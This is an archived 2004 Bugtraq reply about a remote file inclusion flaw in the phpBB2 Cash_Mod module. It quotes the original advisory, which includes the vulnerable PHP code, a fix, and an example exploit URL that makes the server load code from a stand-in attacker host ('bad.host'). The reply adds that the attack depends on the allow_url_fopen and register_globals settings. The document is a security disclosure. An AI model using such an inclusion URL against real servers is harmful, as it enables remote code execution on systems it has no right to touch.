lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <419CD7DE.1070304@yahoo.es>
Date: Thu, 18 Nov 2004 18:11:58 +0100
From: Rafael San Miguel Carrasco <smcsoc@...oo.es>
To: bugtraq@...urityfocus.com
Subject: Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)



Let me just point out that this vulnerability can only be exploited if
two options in php.ini are enabled:

- allow_url_fopen
- register_globals

The first one allows to access and retrieve http resources from fopen;
the second lets a user specify GET or POST parameters that will be
translated into PHP variables.

For more information about PHP insertion and how it can be recognized
and exploited:
http://www.fistconference.org/data/presentaciones/exploitingwebapplications.tar

Greetings.

-------------------------------
Rafael San Miguel Carrasco
Security Consultant
Davinci Consulting
-------------------------------

Jerome ATHIAS wrote:

>Hi all 
>
>phpBB is a very popular message board using modules extensions. 
>
>One of these module – Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side. 
>
>Let’s start : 
>
>In file /admin/admin_cash.php 
>
>….. 
>if ( !empty($setmodules) ) 
>{ 
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); 
>$menu = array(); 
>admin_menu($menu); 
>…. 
>
>First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but 
>$phpbb_root_path & .$phpEx – are *NOT* define yet! 
>
>
>I don’t know why, but someone decided to define these variables later in the code : 
>
>…… 
>// 
>// Let's set the root dir for phpBB 
>// 
>$phpbb_root_path = "./../"; 
>require($phpbb_root_path . 'extension.inc'); 
>require('./pagestart.' . $phpEx); 
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); 
>
>….. 
>
>Well, any user can rewrite these parameters with GET or POST requests. 
>
>Example : 
>http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/ 
>
>
>Fix : 
>Set all default parameters after “if ( !empty($setmodules) )” 
>
>Example : 
>
>// 
>// Let's set the root dir for phpBB 
>// 
>$phpbb_root_path = "./../"; 
>require($phpbb_root_path . 'extension.inc'); 
>require('./pagestart.' . $phpEx); 
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); 
>
>if ( !empty($setmodules) ) 
>{ 
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); 
>$menu = array(); 
>admin_menu($menu); 
>
>
>Thank you rofl!
>
>  
>

Powered by blists - more mailing lists